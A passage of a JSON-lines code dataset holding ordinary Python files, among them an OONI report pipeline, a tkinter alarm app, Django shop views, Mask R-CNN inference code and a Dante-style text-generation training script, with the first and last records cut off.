logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\nclass Setup(object):\n\n @staticmethod\n def run():\n for path in oonilyzer.local_targets.values():\n os.makedirs(path, exist_ok=True)\n\n\nclass IdentifyRawReports(object):\n\n @staticmethod\n def run(start_date, end_date, **kwargs):\n bucket = oonilyzer.models.s3.CachedBucket(name=oonilyzer.buckets['raw'])\n dates = pd.date_range(start_date, end_date).strftime('%Y-%m-%d')\n prefixes = map(lambda date: os.path.join(oonilyzer.s3_targets['raw'], date), dates)\n\n return list(bucket.get_keys(prefixes))\n\n\nclass DownloadRawReports(object):\n targets = None\n\n @staticmethod\n def run(**kwargs):\n DownloadRawReports.targets = kwargs['ti'].xcom_pull(key=None, task_ids='identify')\n\n targets = list(filter(lambda x: os.path.exists(x.destination) is False, DownloadRawReports.targets))\n total_size = sum(map(lambda x: x.size, targets))\n\n logging.info(\"Fetching %d targets (%s)\" % (len(targets), oonilyzer.helpers.usability.sizeof_fmt(total_size)))\n\n manager = mp.Manager()\n queue = manager.Queue()\n\n [queue.put(target) for target in targets]\n\n processes = []\n for i in range(0, mp.cpu_count()):\n process = mp.Process(target=DownloadRawReports.get, args=[queue])\n process.start()\n processes.append(process)\n queue.put(None)\n\n for process in processes:\n process.join()\n\n return list(map(lambda x: x.destination, DownloadRawReports.targets))\n\n @staticmethod\n def get(q):\n pid = os.getpid()\n\n bucket = oonilyzer.models.s3.CachedBucket(name=oonilyzer.buckets['raw'])\n for target in iter(q.get, None):\n\n file_size = oonilyzer.helpers.usability.sizeof_fmt(target.size)\n logging.info(\"[%d] Downloading %s from %s\" % (os.getpid(), file_size, target.url))\n\n data = DownloadRawReports.normalize(target=target,\n data=io.StringIO(bucket.get_key_as_string(target).decode('utf-8')))\n if data:\n oonilyzer.helpers.files.save(path=target.destination, data=data)\n logging.info(\"[%d] Saved %s to %s\" % (os.getpid(), file_size, target.destination))\n\n gc.collect()\n\n @staticmethod\n def normalize(target, data):\n logging.info(\"[%d] Normalising %s\" % (os.getpid(), target.source))\n\n if target.source.endswith(('.yaml', '.yml', '.yamloo')):\n return list(yaml.load_all(data, Loader=Loader))\n\n elif target.source.endswith('.json'):\n lines = []\n for line in data:\n try:\n line = json.loads(line)\n lines.append(line)\n\n except json.decoder.JSONDecodeError as E:\n logging.error(\"Encountered malformed JSON in: %s\" % target.url)\n\n return lines\n\n else:\n logging.warning(\"Expected file to be in YAML or JSON lines format, got: %s\" % target.source)\n return None\n\n\nclass NormaliseRawReports(object):\n targets = None\n\n @staticmethod\n def run(**kwargs):\n NormaliseRawReports.targets = kwargs['ti'].xcom_pull(key=None, task_ids='download')\n\n manager = mp.Manager()\n queue = manager.Queue()\n\n [queue.put(target) for target in NormaliseRawReports.targets]\n\n processes = []\n for i in range(0, mp.cpu_count()):\n process = mp.Process(target=NormaliseRawReports.worker, args=[queue])\n process.start()\n processes.append(process)\n queue.put(None)\n\n for process in processes:\n process.join()\n\n @staticmethod\n def worker(q):\n pid = os.getpid()\n for target in iter(q.get, None):\n try:\n print(\"[%d] is normalising %s\" % (pid, target))\n metrics = NormaliseRawReports.normalise(target=target, tests=oonilyzer.helpers.files.load(target))\n\n except (ValueError, EOFError) as E:\n logging.info(\"%s appears to be corrupt, removing it\" % target)\n os.remove(target)\n\n @staticmethod\n def normalise(target, tests):\n def deduplicate(metric):\n duplicates = set(metric.keys()).intersection(set(metric['test_keys'].keys()))\n for k in duplicates:\n if metric[k] == metric['test_keys'][k]:\n del metric['test_keys'][k]\n return metric\n\n def get_header():\n if isinstance(tests, list):\n for a in tests:\n for b in tests:\n if a.keys() != b.keys():\n return a\n return None\n\n header = get_header()\n if not header:\n return tests\n else:\n metrics = []\n for test in tests:\n if header == test:\n continue\n else:\n metric = copy.deepcopy(header)\n metric['test_keys'] = test\n\n missing_keys = oonilyzer.metric_schema - metric.keys()\n if missing_keys:\n flattened_metric = oonilyzer.helpers.types.flatten_dict(metric)\n relocatable_keys = list(\n filter(lambda x: x in flattened_metric.keys() and x not in metric, missing_keys)\n )\n for k in missing_keys:\n if k in relocatable_keys:\n metric[k] = flattened_metric[k]\n else:\n metric[k] = None\n\n metrics.append(deduplicate(metric))\n return metrics\n","sub_path":"oonilyzer/pipeline/phases.py","file_name":"phases.py","file_ext":"py","file_size_in_byte":6463,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"570335716","text":"import tkinter as tk\r\nfrom set_alarm import *\r\nimport Pmw\r\nfrom datetime import datetime, timedelta\r\n\r\ndef time_difference(next_date, pm_am):\r\n current_date = datetime.today()\r\n hour = current_date.hour\r\n minute = current_date.minute\r\n second = current_date.second\r\n day = current_date.weekday()\r\n\r\n current_delta = timedelta(days=day, hours=hour, minutes=minute, seconds=second)\r\n diff_total_time = (next_date - current_delta)\r\n diff = diff_total_time.seconds\r\n if diff_total_time.days == -1:\r\n diff = diff_total_time.seconds\r\n else:\r\n diff = (abs(diff_total_time.days)*86400)+diff_total_time.seconds\r\n seconds = (diff%60)\r\n minutes = (diff//60) % 60\r\n\r\n hours = (diff//3600) % 24\r\n\r\n days = (diff//86400)%7\r\n return days, hours, minutes, seconds\r\n\r\nclass AlarmDetails(tk.Frame):\r\n hours = [str(num) for num in range(1, 13)]\r\n minutes = [str(num).rjust(2, '0') for num in range(0, 60)]\r\n format = ['AM', 'PM']\r\n days = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday',\r\n 'Saturday', 'Sunday']\r\n sounds = ['Xylophone', 'Chords', 'Times', 'Tap', 'Jingle']\r\n snooze_time = ['5 minutes', '10 minutes', '20 minutes', '30 minutes', '1 hour']\r\n def __init__(self, main, master=None, old_file={}, name='', **kw):\r\n super().__init__(main, **kw)\r\n self.master = master\r\n self.frame = None\r\n self.name = name\r\n text = 'EDIT ALARM' if old_file else 'NEW ALARM'\r\n self.new = True if old_file else False\r\n tk.Label(self, text=text, font=('arial', 11, 'bold')).pack(side=tk.TOP, anchor=tk.W)\r\n\r\n self.time = []\r\n frame = tk.Frame(self)\r\n self.approximate_time = tk.StringVar()\r\n for time in [self.hours, self.minutes, self.format]:\r\n s = SetAlarm(frame, time, start=len(time)//2, width=150, height=180, takefocus=1)\r\n self.time.append(s)\r\n s.pack(side=tk.LEFT)\r\n frame.pack(side=tk.TOP)\r\n tk.Label(self, textvar=self.approximate_time, fg=rgb(121, 121, 121)).pack(side=tk.TOP)\r\n\r\n #this holds the buttons such as save, delete and cancel\r\n frame2 = tk.Frame(self)\r\n tk.Button(frame2, text='Cancel', relief=tk.FLAT, font=('arial', 11),\r\n command=lambda s= self: self.master.cancel(s)).pack(side=tk.RIGHT,padx=(5))\r\n if old_file:\r\n tk.Button(frame2, text='Delete', relief=tk.FLAT, font=('arial', 11),\r\n command=lambda s= self: self.master.delete(s)).pack(side=tk.RIGHT,padx=(5))\r\n tk.Button(frame2, text='Save', command=lambda s= self: self.master.save_file(s), relief=tk.FLAT,\r\n font=('arial', 11)).pack(side=tk.RIGHT,padx=(5))\r\n frame2.pack(side=tk.BOTTOM, fill=tk.BOTH, expand=True, anchor=tk.S)\r\n\r\n scroll_bar = Pmw.ScrolledFrame(self,\r\n hull_width=400, hull_height=220)\r\n scroll_bar.pack(fill='both', expand=1)\r\n scroll_frame = scroll_bar.interior()\r\n scroll_frame.configure(takefocus=0)\r\n scroll_frame.bind('', lambda x: self.cancel_widget())\r\n tk.Label(scroll_frame, text='Alarm name', font=('arial', 11)).pack(side=tk.TOP, anchor=tk.W, pady=(10), padx=(5))\r\n self.alarm_name = tk.StringVar()\r\n tk.Entry(scroll_frame, fg='blue', textvar=self.alarm_name, width=60, takefocus=1).pack(side=tk.TOP, anchor=tk.W, padx=(5))\r\n\r\n tk.Label(scroll_frame, text='Repeats', font=('arial', 11)).pack(side=tk.TOP, anchor=tk.W, pady=(10), padx=(5))\r\n self.repeat_days = {day: tk.BooleanVar() for day in self.days}\r\n self.alarm_days_name = tk.StringVar()\r\n self.alarm_days_name.set('Only Once')\r\n self.alarm_days = tk.Button(scroll_frame, textvar=self.alarm_days_name, relief=tk.FLAT, font=('arial', 11), fg='blue',\r\n command=self.show_days)\r\n self.alarm_days.bind('', lambda x, s=self: s.show_days())\r\n self.alarm_days.pack(side=tk.TOP, anchor=tk.W)\r\n\r\n tk.Label(scroll_frame, text='Sound', font=('arial', 11)).pack(side=tk.TOP, anchor=tk.W, pady=(10), padx=(5))\r\n self.alarm_tunes_name = tk.StringVar()\r\n self.alarm_tunes_name.set('Charms')\r\n self.alarm_tunes = tk.Button(scroll_frame, textvar=self.alarm_tunes_name, relief=tk.FLAT, font=('arial', 11), fg='blue',\r\n command=self.show_sounds)\r\n self.alarm_tunes.bind('', lambda x, s=self: s.show_sounds())\r\n self.alarm_tunes.pack(side=tk.TOP, anchor=tk.W)\r\n tk.Label(scroll_frame, text='Snooze time', font=('arial', 11)).pack(side=tk.TOP, anchor=tk.W, pady=(10), padx=(5))\r\n self.snooze_option = tk.StringVar()\r\n self.snooze_option.set('30 minutes')\r\n self.snooze_button = tk.Button(scroll_frame, textvar=self.snooze_option, relief=tk.FLAT, font=('arial', 11), fg='blue',\r\n command=self.show_snooze_time)\r\n self.snooze_button.pack(side=tk.TOP, anchor=tk.W, padx=(5))\r\n self.snooze_button.bind('', lambda x, s=self: s.show_snooze_time())\r\n\r\n self.next_day = datetime.today().weekday()\r\n #when the user clicks on the mouse button (clicked on the main widget and not not mini widgets)\r\n #and a mini widget is currently being displayed,\r\n #that widget would be displayed\r\n self.bind('', lambda x: self.cancel_widget())\r\n if old_file:\r\n self.load_save_file(old_file)\r\n\r\n self.approximate_time_left()\r\n\r\n def load_save_file(self, save_file):\r\n #produces the time of the alarm going off\r\n time_data = save_file['alarm_time'].split(':')\r\n for time in range(len((time_data))):\r\n time_index = self.time[time]\r\n get = time_index.buttons.index(time_data[time])-1\r\n time_index.set_region(get, True)\r\n\r\n #get the alarm name\r\n self.alarm_name.set(save_file['alarm_name'])\r\n\r\n #get the repeated days\r\n for repeat_day in save_file['repeat_days']:\r\n self.repeat_days[repeat_day].set(True)\r\n self.get_ticked_days()\r\n\r\n #set the alarm tunes name\r\n self.alarm_tunes_name.set(save_file['alarm_tunes_name'])\r\n\r\n #set the snooze timer\r\n self.snooze_option.set(save_file['snooze_time'])\r\n\r\n def approximate_time_left(self):\r\n time = [time.clicked_on for time in self.time]\r\n if time[-1] == 'PM':\r\n hour = int(time[0])+12\r\n else:\r\n hour = int(time[0])\r\n min = int(time[1])\r\n cur_delta = timedelta(days=self.next_day, hours=hour, minutes=min)\r\n new_day, new_hour, new_min, new_sec = time_difference(cur_delta, time[-1])\r\n time_left = 'In '\r\n if new_day:\r\n time_left += '%d days, ' % new_day\r\n if new_hour:\r\n time_left += '%d hours, ' % new_hour\r\n if new_min:\r\n time_left += '%d minutes' % new_min\r\n if new_sec and sum([new_day, new_hour, new_min]) == 0:\r\n time_left += ' %d seconds' % new_sec\r\n\r\n self.approximate_time.set(time_left)\r\n self.after(60, self.approximate_time_left)\r\n\r\n def show_days(self):\r\n self.cancel_widget()\r\n self.frame = tk.Frame(self)\r\n for day in self.days:\r\n tk.Checkbutton(self.frame, text=day, takefocus=0, state=tk.NORMAL, anchor=tk.W, variable=self.repeat_days[day],\r\n bg=HOVER_BUTTON, height=2, width=40).pack(side=tk.TOP)\r\n self.frame.func = self.get_ticked_days\r\n self.frame.place(relx=0.02, rely=0.2)\r\n\r\n def show_sounds(self):\r\n self.cancel_widget()\r\n self.frame = tk.Frame(self, bg=HOVER_BUTTON)\r\n for ind, sound in enumerate(self.sounds):\r\n tk.Button(self.frame, text='play',takefocus=0, anchor=tk.W, relief=tk.FLAT,\r\n bg=HOVER_BUTTON, height=2).grid(row=ind, column=1)\r\n tk.Button(self.frame, text=sound,takefocus=0, anchor=tk.W, relief=tk.FLAT, command=lambda s=self,sou=sound:s.set_sound(sou),\r\n bg=HOVER_BUTTON, height=2, width=40).grid(row=ind, column=2)\r\n\r\n self.frame.place(relx=0.02, rely=0.41)\r\n\r\n def set_sound(self, sound):\r\n self.alarm_tunes_name.set(sound)\r\n self.cancel_widget()\r\n\r\n def show_snooze_time(self):\r\n self.cancel_widget()\r\n self.frame = tk.Frame(self)\r\n for snooze_time in self.snooze_time:\r\n tk.Button(self.frame, text=snooze_time, takefocus=0, anchor=tk.W, relief=tk.FLAT, bg=HOVER_BUTTON, height=2,\r\n width=40, command=lambda s=self,sou=snooze_time:s.set_snooze_time(sou)).pack(side=tk.TOP)\r\n self.frame.place(relx=0.02, rely=0.55)\r\n\r\n def set_snooze_time(self, sound):\r\n self.snooze_option.set(sound)\r\n self.cancel_widget()\r\n\r\n def get_ticked_days(self):\r\n repeat_days = []\r\n for day, value in self.repeat_days.items():\r\n if value.get():\r\n repeat_days.append(day[:3])\r\n if len(repeat_days) == len(self.repeat_days):\r\n self.alarm_days_name.set('Everyday')\r\n elif not len(repeat_days):\r\n self.alarm_days_name.set('Only Once')\r\n else:\r\n if 'Sat' in repeat_days and 'Sun' in repeat_days:\r\n repeat_days.remove('Sat')\r\n repeat_days.remove('Sun')\r\n repeat_days.insert(0, 'Weekends')\r\n self.alarm_days_name.set(', '.join(repeat_days))\r\n nearest_day = self.get_closest_day(repeat_days)\r\n self.next_day = nearest_day\r\n\r\n def get_closest_day(self, repeat_days):\r\n 'This gets the closest day to when the alarm is meant to repeat'\r\n today = datetime.today().weekday()\r\n if self.days[today][:3] in repeat_days:\r\n return today\r\n if 'Weekends' in repeat_days:\r\n repeat_days.remove('Weekends')\r\n repeat_days.append('Sat')\r\n repeat_days.append('Sun')\r\n nearest_day = (today+1)%len(self.days)\r\n\r\n while nearest_day != today:\r\n if self.days[nearest_day][:3] in repeat_days:\r\n if nearest_day >= today:\r\n return nearest_day\r\n else:\r\n return nearest_day+7\r\n nearest_day = (nearest_day+1) % len(self.days)\r\n return today\r\n\r\n def cancel_widget(self):\r\n if self.frame:\r\n self.frame.destroy()\r\n try:\r\n self.frame.func()\r\n except AttributeError:\r\n pass\r\n self.frame = None\r\n\r\nif __name__ == '__main__':\r\n root = tk.Tk()\r\n AlarmDetails(root, width=462, height=563).pack()\r\n root.mainloop()\r\n","sub_path":"alarm_details.py","file_name":"alarm_details.py","file_ext":"py","file_size_in_byte":10801,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"284942835","text":"import pandas as pd\nimport numpy as np\nimport json\nfrom pandas.io.json import json_normalize\n\nwith open('testinput/flight_failure/flight_failed.json') as f:\n data_1 = json.load(f)\n\ndata_df1 = json_normalize(data_1['flights'])\nprint(data_df1.shape)\n\ndata_df1.drop(data_df1.select_dtypes(['object']), inplace=True, axis=1)\nprint(\"dropped string fields\")\nprint(data_df1.shape)\n\ndf_all = data_df1[np.isfinite(data_df1['highest_failure_level.id'])]\ndf_all.dropna(axis=1, how='all', inplace=True)\n\nprint(\"dropped string fields\")\nprint(df_all.shape)\n\ndf_all.fillna(0, inplace=True)\ndf_all.to_csv('testinput/flights_failed.csv', encoding='utf-8', index=False)\n","sub_path":"Abhishek_arm_test/src/clean_test_data.py","file_name":"clean_test_data.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"348919554","text":"from re import M\n\nfrom django.http import HttpResponse\nfrom django.shortcuts import render, redirect\n\n# Create your views here.\nfrom axf.models import Wheel, Nav, Mustbuy, Commodity, Mainshow, Foottypes, Goods\n\n\ndef home(request):\n wheels = Wheel.objects.all()\n navs = Nav.objects.all()\n mustbuys = Mustbuy.objects.all()\n\n commoditys = Commodity.objects.all()\n commodity0 = commoditys[0]\n commodity1s = commoditys[1:3]\n commodity2s = commoditys[3:7]\n commodity3s = commoditys[7:11]\n\n mainshows = Mainshow.objects.all()\n request_dir = {\n 'wheels':wheels,\n 'navs':navs,\n 'mustbuys':mustbuys,\n 'commodity0':commodity0,\n 'commodity1s': commodity1s,\n 'commodity2s': commodity2s,\n 'commodity3s': commodity3s,\n 'mainshows':mainshows\n }\n return render(request, 'home/home.html',request_dir)\n\n\ndef market(request, childid='0', sortid='0'):\n foodtypes = Foottypes.objects.all()\n\n index = int(request.COOKIES.get('index', '0'))\n\n categoryid = foodtypes[index].typeid\n\n if childid == '0':\n goods = Goods.objects.filter(categoryid=categoryid)\n else:\n goods = Goods.objects.filter(categoryid=categoryid).filter(childcid=childid)\n\n if sortid == '1':\n goods = goods.order_by('-productnum')\n elif sortid == '2':\n goods = goods.order_by('price')\n elif sortid == '3':\n goods = goods.order_by('-price')\n\n\n childtypenames = foodtypes[index].childtypenames\n childtype_list = []\n\n for item in childtypenames.split('#'):\n item_arr = item.split(':')\n temp_dir = {\n 'name': item_arr[0],\n 'id': item_arr[1]\n }\n\n childtype_list.append(temp_dir)\n\n request_dir = {\n 'foodtypes': foodtypes,\n 'goods': goods,\n 'childtype_list': childtype_list,\n 'childid': childid\n }\n return render(request, 'market/market.html', request_dir)\n\n\n\n\ndef cart(request):\n return render(request, 'cart/cart.html')\n\n\ndef mine(request):\n return render(request, 'mine/mine.html')\n\n","sub_path":"mygithub/python1812axf/axf/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2076,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"183482659","text":"\"\"\"empty message\n\nRevision ID: 525b5cdb6d85\nRevises: 9de21e7c6f38\nCreate Date: 2021-11-16 19:19:37.901668\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nfrom sqlalchemy.dialects import postgresql\n\n# revision identifiers, used by Alembic.\nrevision = '525b5cdb6d85'\ndown_revision = '9de21e7c6f38'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('rentals', 'due_date')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('rentals', sa.Column('due_date', postgresql.TIMESTAMP(), autoincrement=False, nullable=True))\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/525b5cdb6d85_.py","file_name":"525b5cdb6d85_.py","file_ext":"py","file_size_in_byte":731,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"326818245","text":"def setup():\n size(300, 300)\n background(255)\n strokeWeight(3)\n xo = 40\n yo = 200\n leng = int(random(50,100))\n i = 0\n points = []\n while( i < leng):\n i = i + int(random(13, 20))\n if(i > leng):\n points.append(leng)\n else:\n points.append(i)\n print(leng)\n print(points)\n ant = 0\n hant = 0\n for pnt in points:\n i = ant + 2\n j = hant\n desti = pnt - 2\n detj = h\n \n if pnt == leng:\n h = 0\n else:\n h = int(random(20, 45))\n line( xo + pnt - 2, yo -h, xo + pnt + 2, yo - h)\n ant = pnt\n hant = h\n line(xo, yo, xo+3, yo+3)\n line(xo+3, yo+3, xo + leng-3, yo+3)\n line(xo + leng -3, yo + 3, xo + leng, yo)\n","sub_path":"dino_game/nube.pyde","file_name":"nube.pyde","file_ext":"pyde","file_size_in_byte":781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"407867313","text":"import numpy as np\nimport json\n\nclass ColorMapper():\n def __init__(self, path_to_colormap_file, path_to_classmap_file):\n self.color_dict = self.__load_color_dict(path_to_colormap_file, path_to_classmap_file)\n\n def __load_color_dict(self, path_to_colormap_file, path_to_classmap_file):\n # Get name -> class relation\n colormap = None\n with open(path_to_colormap_file) as file:\n json_array = json.load(file)\n colormap = json_array[\"ColorMapping\"]\n # Get name -> color relation\n classmap = None\n with open(path_to_classmap_file) as file:\n json_array = json.load(file)\n classmap = json_array[\"ClassMapping\"]\n # Generate class -> color\n color_dict = {}\n for key in colormap:\n color_dict[classmap[key]] = colormap[key] \n return color_dict\n\n def segmentation_to_color(self, segmentation_prediction):\n for key in self.color_dict:\n segmentation_prediction[segmentation_prediction==key] = self.color_dict[key]\n return segmentation_prediction","sub_path":"lib/Utility/segmentation_remap.py","file_name":"segmentation_remap.py","file_ext":"py","file_size_in_byte":1096,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"586210057","text":"outfile=open(\"c:\\\\users\\\\이한나\\\\documents\\\\f.txt\",\"w\")\r\noutfile.write(\"fame\")\r\noutfile.close()\r\n\r\ninfile=open(\"c:\\\\users\\\\이한나\\\\documents\\\\f.txt\",\"a\")\r\ninfile.write(\"\\nfriday\\nframe\\nfast\\nfall\\nfuture\\nall we are challengers\")\r\ninfile.close()\r\n\r\ninfile=open(\"c:\\\\users\\\\이한나\\\\documents\\\\f.txt\",\"r\")\r\nfor line in infile:\r\n line=line.rstrip()\r\n word_list=line.split()\r\n for word in word_list:\r\n print(word)\r\ninfile.close()\r\n","sub_path":"파일연습.py","file_name":"파일연습.py","file_ext":"py","file_size_in_byte":453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"525163729","text":"# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved.\nimport datetime\nimport logging\nimport time\nimport os\n\nimport torch\nfrom tqdm import tqdm\n\nfrom maskrcnn_benchmark.data.datasets.evaluation import evaluate\nfrom ..utils.comm import is_main_process, get_world_size\nfrom ..utils.comm import all_gather\nfrom ..utils.comm import synchronize\n\ncoco2cityscapes_map = { 1: 1,# person\n 2: 4, # bicycle\n 3: 2, # car\n 4: 5, # motorcycle\n 6: 6, #bus\n 7: 7,# train\n 8: 8,#truck\"\n } \n\ndef coco2cityscapes_label(predictions):\n ''' \n convert coco class label to cityscapes label.\n Arguments:\n predictions: a BoxList object.\n Return\n predictions: a BoxList object with labels converted.\n '''\n # print('Warning: converting coco model prediction to cityscapes!')\n idx_to_keep = []\n for i in range(len(predictions.extra_fields['labels'])):\n try:\n predictions.extra_fields['labels'][i] = coco2cityscapes_map[int(predictions.extra_fields['labels'][i])]\n idx_to_keep.append(i)\n except:\n '''remove this class since doesnt in Cityscapes'''\n continue\n\n predictions.bbox = predictions.bbox[idx_to_keep]\n # print('predictions.extra_fields: ', predictions.extra_fields.keys())\n predictions.extra_fields['scores'] = predictions.extra_fields['scores'][idx_to_keep]\n predictions.extra_fields['mask'] = predictions.extra_fields['mask'][idx_to_keep]\n predictions.extra_fields['labels'] = predictions.extra_fields['labels'][idx_to_keep]\n return predictions\n\n\ndef compute_on_dataset(model, data_loader, device, convert_pred_coco2cityscapes=False):\n model.eval()\n results_dict = {}\n cpu_device = torch.device(\"cpu\")\n for i, batch in enumerate(tqdm(data_loader)):\n images, targets, image_ids = batch\n images = images.to(device)\n with torch.no_grad():\n output = model(images)\n tmp = []\n for j, o in enumerate(output):\n o = o.to(cpu_device)\n if convert_pred_coco2cityscapes:\n o = coco2cityscapes_label(o)\n output[j] = o\n results_dict.update(\n {img_id: result for img_id, result in zip(image_ids, output)}\n )\n return results_dict\n\n\ndef _accumulate_predictions_from_multiple_gpus(predictions_per_gpu):\n all_predictions = all_gather(predictions_per_gpu)\n if not is_main_process():\n return\n # merge the list of dicts\n predictions = {}\n for p in all_predictions:\n predictions.update(p)\n # convert a dict where the key is the index in a list\n image_ids = list(sorted(predictions.keys()))\n if len(image_ids) != image_ids[-1] + 1:\n logger = logging.getLogger(\"maskrcnn_benchmark.inference\")\n logger.warning(\n \"Number of images that were gathered from multiple processes is not \"\n \"a contiguous set. Some images might be missing from the evaluation\"\n )\n\n # convert to a list\n predictions = [predictions[i] for i in image_ids]\n return predictions\n\n\ndef inference(\n model,\n data_loader,\n dataset_name,\n iou_types=(\"bbox\",),\n box_only=False,\n device=\"cuda\",\n expected_results=(),\n expected_results_sigma_tol=4,\n output_folder=None,\n convert_pred_coco2cityscapes=False,\n):\n # convert to a torch.device for efficiency\n device = torch.device(device)\n num_devices = get_world_size()\n logger = logging.getLogger(\"maskrcnn_benchmark.inference\")\n dataset = data_loader.dataset\n logger.info(\"Start evaluation on {} dataset({} images).\".format(dataset_name, len(dataset)))\n start_time = time.time()\n predictions = compute_on_dataset(model, data_loader, device, convert_pred_coco2cityscapes)\n\n # if convert_pred_coco2cityscapes:\n # '''Only convert it when testing COCO trained model on Cityscpaes dataset'''\n # print('Warning: converting coco model prediction to cityscapes!')\n # predictions = coco2cityscapes_label(predictions)\n\n # wait for all processes to complete before measuring the time\n synchronize()\n total_time = time.time() - start_time\n total_time_str = str(datetime.timedelta(seconds=total_time))\n logger.info(\n \"Total inference time: {} ({} s / img per device, on {} devices)\".format(\n total_time_str, total_time * num_devices / len(dataset), num_devices\n )\n )\n\n predictions = _accumulate_predictions_from_multiple_gpus(predictions)\n if not is_main_process():\n return\n\n if output_folder:\n torch.save(predictions, os.path.join(output_folder, \"predictions.pth\"))\n\n extra_args = dict(\n box_only=box_only,\n iou_types=iou_types,\n expected_results=expected_results,\n expected_results_sigma_tol=expected_results_sigma_tol,\n )\n\n return evaluate(dataset=dataset,\n predictions=predictions,\n output_folder=output_folder,\n **extra_args)\n","sub_path":"maskrcnn_benchmark/engine/inference.py","file_name":"inference.py","file_ext":"py","file_size_in_byte":5202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"19950418","text":"import os\nimport sys\nsys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))\nos.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'\n\nimport numpy as np\nimport tensorflow as tf\ntf.get_logger().setLevel('ERROR')\n\nfrom dante_by_rev_syl.data_preparation import build_vocab_verse, build_dataset_verse, split_dataset\nfrom dante_by_rev_syl.text_processing import clean_comedy, prettify_text, special_tokens\nfrom dante_by_rev_syl.dante_model import build_model\nfrom dante_by_rev_syl.training_dante import train_model\nfrom utils import save_vocab, load_vocab\n\n\nworking_dir = os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'dante_by_rev_syl')\n\ndivine_comedy_file = os.path.join(os.path.dirname(working_dir), \"divina_commedia\", \"divina_commedia_accent_UTF-8.txt\") \n\n\nwith open(divine_comedy_file,\"r\") as f:\n divine_comedy = f.read()\n\ndivine_comedy = clean_comedy(divine_comedy, special_tokens)\n\n\n##############################\n# Training's hyper-parameters\n\n## VERSION 1\n\nBATCH_SIZE = 32\nEPOCHS = 200\nSEQ_LENGTH = 100\nEMBEDDING_DIM = 256\nRNN_UNITS = 1024\nRNN_TYPE = 'lstm'\n\n## VERSION 2\n\n# BATCH_SIZE = 32\n# EPOCHS = 200\n# SEQ_LENGTH = 25\n# EMBEDDING_DIM = 256\n# RNN_UNITS = 1024\n# RNN_TYPE = 'lstm'\n\n## VERSION 3\n\n# BATCH_SIZE = 32\n# EPOCHS = 200\n# SEQ_LENGTH = 50\n# EMBEDDING_DIM = 256\n# RNN_UNITS = 1024\n# RNN_TYPE = 'lstm'\n\n##############################\n\nvocab_verse, idx2syl_verse, syl2idx_verse = build_vocab_verse(divine_comedy)\n\ndataset_verse = build_dataset_verse(divine_comedy, vocab_verse, idx2syl_verse, syl2idx_verse, seq_length=SEQ_LENGTH)\n\n\n# Path where the vocab will be saved\nlogs_dir = os.path.join(working_dir, 'logs')\nos.makedirs(logs_dir, exist_ok = True) \nvocab_file_verse = os.path.join(logs_dir, 'vocab_verse.json')\n\nsave_vocab(vocab_verse, idx2syl_verse, syl2idx_verse, vocab_file_verse)\n\ndataset_train_verse, dataset_val_verse = split_dataset(dataset_verse)\n\n\ndataset_train_verse = dataset_train_verse.batch(BATCH_SIZE, drop_remainder=True)\ndataset_val_verse = dataset_val_verse.batch(BATCH_SIZE, drop_remainder=True)\n\n\nmodel_verse = build_model(\n name='VerseNetwork',\n vocab_size = len(vocab_verse),\n seq_length = SEQ_LENGTH,\n embedding_dim=EMBEDDING_DIM,\n rnn_type = RNN_TYPE,\n rnn_units=RNN_UNITS,\n learning_rate=0.01,\n )\n\n\n\nmodel_filename_verse = 'model_by_rev_syl_verse_seq{}_emb{}_{}{}'.format(SEQ_LENGTH, EMBEDDING_DIM, RNN_TYPE, RNN_UNITS)\n\ntrain_model(working_dir, \n model_verse,\n model_filename_verse,\n dataset_train_verse, \n dataset_val_verse, \n epochs=EPOCHS, \n )\n\n\n\n","sub_path":"training_scripts/train_by_rev_syl_verse.py","file_name":"train_by_rev_syl_verse.py","file_ext":"py","file_size_in_byte":2598,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"16177782","text":"import cv2\nfrom sklearn.externals import joblib\nimport matplotlib.pyplot as plt\nimport windowing.windower as w\n\nsvc = joblib.load('../../saved_models/svc_rgb_all.pkl')\nx_scaler = joblib.load('../../saved_models/x_scaler_rgb_all.pkl')\nfile_name = 'test5.jpg'\nbgr_image = cv2.imread(filename='../../test_images/' + file_name)\nrgb_image = cv2.cvtColor(src=bgr_image, code=cv2.COLOR_BGR2RGB)\n\nsmall_windows = w.slide_window(img=rgb_image, xy_window=[64, 64], y_start_stop=[400, 464], xy_overlap=[0.5, 0.5])\nmedium_windows = w.slide_window(img=rgb_image, xy_window=[96, 96], y_start_stop=[400, 592], xy_overlap=[0.75, 0.75])\nlarge_windows = w.slide_window(img=rgb_image, xy_window=[128, 128], y_start_stop=[400, 650], xy_overlap=[0.75, 0.75])\n\ntriggered_windows_small = w.search_windows(img=rgb_image, windows=small_windows, classifier=svc, scaler=x_scaler)\ntriggered_windows_medium = w.search_windows(img=rgb_image, windows=medium_windows, classifier=svc, scaler=x_scaler)\ntriggered_windows_large = w.search_windows(img=rgb_image, windows=large_windows, classifier=svc, 